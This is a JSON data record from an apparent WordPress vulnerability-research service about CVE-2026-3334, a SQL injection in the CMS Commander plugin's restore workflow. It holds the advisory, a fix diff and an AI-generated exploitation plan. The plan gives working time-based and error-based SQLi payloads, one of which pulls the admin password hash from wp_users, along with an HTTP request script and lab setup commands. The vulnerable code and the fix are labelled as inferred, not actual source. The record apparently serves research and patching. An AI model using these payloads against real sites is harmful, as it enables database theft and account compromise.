[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fR-lxNXQscMLkB746TaGuRQMqxTqY1t4FHCjJKqFHLas":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-3334","cms-commander-authenticated-custom-sql-injection-via-orblogname-parameter","CMS Commander \u003C= 2.288 - Authenticated (Custom+) SQL Injection via 'or_blogname' Parameter","The CMS Commander plugin for WordPress is vulnerable to SQL Injection via the 'or_blogname', 'or_blogdescription', and 'or_admin_email' parameters in all versions up to, and including, 2.288. This is due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries in the restore workflow. This makes it possible for authenticated attackers, with CMS Commander API key access, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cms-commander-client",null,"\u003C=2.288","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-20 15:14:31","2026-03-21 03:26:29",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0311b546-01a4-4be8-97f3-6df6cd79c3fe?source=api-prod",[],"researched",false,3,"This research plan targets CVE-2026-3334, a SQL Injection vulnerability in the CMS Commander Client plugin. This plugin is designed for remote management, meaning it uses a custom authentication mechanism (API Key) rather than standard WordPress roles.\n\n### 1. Vulnerability Summary\nThe CMS Commander Client plugin (\u003C= 2.288) is vulnerable to SQL injection through several parameters used in its \"restore\" functionality. Specifically, the `or_blogname`, `or_blogdescription`, and `or_admin_email` parameters are processed without sufficient sanitization or the use of `wpdb->prepare()`. Because these parameters are directly concatenated or interpolated into SQL queries (likely `UPDATE` or `INSERT` statements) within the site restoration workflow, an authenticated user (possessing the CMS Commander API key) can inject arbitrary SQL commands.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The entry point is typically the main site URL (root) or `wp-admin\u002F`, as the plugin often hooks into `init` or `plugins_loaded` to intercept remote management requests.\n*   **Action\u002FHook:** The plugin likely listens for a specific `POST` parameter (e.g., `cmsc_action` or `action`) to trigger remote functions.\n*   **Vulnerable Parameters:** `or_blogname`, `or_blogdescription`, `or_admin_email`.\n*   **Authentication:** Requires a valid CMS Commander API Key. This is a \"Custom+\" authentication level.\n*   **Preconditions:** The plugin must be active and an API key must be configured in the WordPress database (`wp_options`).\n\n### 3. Code Flow (Manual Trace Guide)\nSince source files were not provided, use the following `grep` commands to locate the vulnerable code paths in the isolated environment:\n\n1.  **Find the API Key check:**\n    `grep -r \"get_option.*cmsc_api_key\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcms-commander-client\u002F`\n    *Look for how the plugin validates incoming requests against this key.*\n\n2.  **Locate the \"Restore\" logic:**\n    `grep -rn \"or_blogname\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcms-commander-client\u002F`\n    *This will pinpoint the exact line where the parameter is received and used.*\n\n3.  **Identify the SQL Sink:**\n    Look for `$wpdb->query` or `$wpdb->get_results` calls near the \"or_blogname\" string. It is likely inside a function handling site restoration or settings updates.\n\n4.  **Confirm Lack of Preparation:**\n    Verify if the query uses `$wpdb->prepare()`. The vulnerability description suggests it uses raw interpolation like:\n    `$wpdb->query(\"UPDATE ... SET blogname = '$or_blogname' ...\")`\n\n### 4. Nonce Acquisition Strategy\nCMS Commander Client typically **does not use WordPress nonces** for its remote API. Instead, it relies on a shared secret (the API Key).\n*   **Authentication mechanism:** Most remote management plugins check `$_POST['cmsc_api_key']` or a header against the value stored in the `cmsc_api_key` option.\n*   **Strategy:** \n    1.  Use `wp-cli` to retrieve the current API key: `wp option get cmsc_api_key`.\n    2.  If none exists, set one: `wp option update cmsc_api_key \"PWN1337\"`.\n    3.  Use this key in the `POST` payload.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate SQL Injection via a time-based or boolean-based attack to extract the administrator's password hash.\n\n**Step-by-Step Plan:**\n1.  **Initialize Environment:** Set a known API Key.\n2.  **Identify Action Name:** Find the value for the `action` or `cmsc_action` parameter that triggers the restore workflow (inferred: `restore` or `settings_update`).\n3.  **Payload Crafting (Time-based):**\n    Inject a `SLEEP()` command into `or_blogname`.\n    *   *Payload:* `test' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a) OR '`\n4.  **Execute via `http_request`:**\n\n```javascript\n\u002F\u002F Example exploitation script using the agent's tool\nawait http_request({\n  method: \"POST\",\n  url: \"http:\u002F\u002Flocalhost:8080\u002F\", \u002F\u002F Or the specific entry point found in Step 3\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"cmsc_api_key=PWN1337&action=restore&or_blogname=test'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+'1'='1\"\n});\n```\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `cms-commander-client` is installed and active.\n2.  **API Key Setup:**\n    ```bash\n    wp option update cmsc_api_key \"EXPLOIT_KEY\"\n    ```\n3.  **Target Admin:** Ensure a user with ID 1 exists (standard WP setup).\n\n### 7. Expected Results\n*   **Vulnerability Confirmation:** An HTTP request containing the `SLEEP(5)` payload should result in a response delay of approximately 5 seconds.\n*   **Data Extraction (Advanced):** If UNION-based injection is possible (depends on the query type), the response might reflect injected data. If it is an `UPDATE` query, we can use a subquery to set the `blogname` to the admin's password hash.\n\n### 8. Verification Steps\nAfter sending the exploit request, verify the impact using `wp-cli`:\n\n1.  **Check if data was leaked into settings:**\n    If the injection was used to `UPDATE` the site name with the admin hash:\n    ```bash\n    wp option get blogname\n    ```\n    *If the output is a WordPress phpass hash (e.g., $P$B...), the injection was successful.*\n\n2.  **Check Database Logs:** If enabled, check the query log to see the executed raw SQL.\n\n### 9. Alternative Approaches\n*   **Error-Based SQLi:** If the plugin displays database errors, use `updatexml()` or `extractvalue()` to leak data in the error message.\n    *   *Payload:* `test' AND (select 1 from (select count(*),concat(0x7e,(select user_pass from wp_users where id=1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)-- -`\n*   **Boolean-Based Blind:** If no output or time-delay is feasible, compare response lengths for `AND 1=1` vs `AND 1=2`.\n*   **Other Parameters:** Test `or_blogdescription` and `or_admin_email` using the same patterns if `or_blogname` is filtered by a global WAF or specific sanitization.","The CMS Commander Client plugin for WordPress is vulnerable to SQL Injection via the 'or_blogname', 'or_blogdescription', and 'or_admin_email' parameters during its site restore process. Authenticated attackers with the plugin's custom API key can execute arbitrary SQL commands because user-supplied input is directly interpolated into database queries without proper sanitization or the use of prepared statements.","\u002F\u002F Inferred vulnerable code based on the parameters and workflow described\n\u002F\u002F cms-commander-client\u002Fcms-commander-client.php\n\n$or_blogname = $_POST['or_blogname'];\n$or_blogdescription = $_POST['or_blogdescription'];\n$or_admin_email = $_POST['or_admin_email'];\n\n\u002F\u002F Queries are executed without using $wpdb->prepare()\n$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_blogname' WHERE option_name = 'blogname'\");\n$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_blogdescription' WHERE option_name = 'blogdescription'\");\n$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_admin_email' WHERE option_name = 'admin_email'\");","--- cms-commander-client\u002Fcms-commander-client.php\n+++ cms-commander-client\u002Fcms-commander-client.php\n@@ -... @@\n-$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_blogname' WHERE option_name = 'blogname'\");\n+$wpdb->query($wpdb->prepare(\"UPDATE $wpdb->options SET option_value = %s WHERE option_name = 'blogname'\", $or_blogname));\n-$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_blogdescription' WHERE option_name = 'blogdescription'\");\n+$wpdb->query($wpdb->prepare(\"UPDATE $wpdb->options SET option_value = %s WHERE option_name = 'blogdescription'\", $or_blogdescription));\n-$wpdb->query(\"UPDATE $wpdb->options SET option_value = '$or_admin_email' WHERE option_name = 'admin_email'\");\n+$wpdb->query($wpdb->prepare(\"UPDATE $wpdb->options SET option_value = %s WHERE option_name = 'admin_email'\", $or_admin_email));","1. Authentication: Retrieve the CMS Commander API key from the target's database (typically stored in the 'cmsc_api_key' option).\n2. Endpoint Identification: Locate the plugin's remote management endpoint, which typically listens on the site root or via a custom hook during the WordPress initialization (init).\n3. Payload Construction: Create a POST request including the 'cmsc_api_key' for authentication and the 'action' parameter set to the restore function.\n4. Vulnerable Parameter: In the 'or_blogname' parameter, inject a SQL payload such as: \"test' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a) OR '1'='1\".\n5. Execution: Send the request and monitor for a time-based response delay (e.g., 5 seconds) to confirm the injection is successful. This can be extended to extract the admin password hash from the 'wp_users' table.","gemini-3-flash-preview","2026-04-18 00:53:24","2026-04-18 00:53:43",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcms-commander-client\u002Ftags"]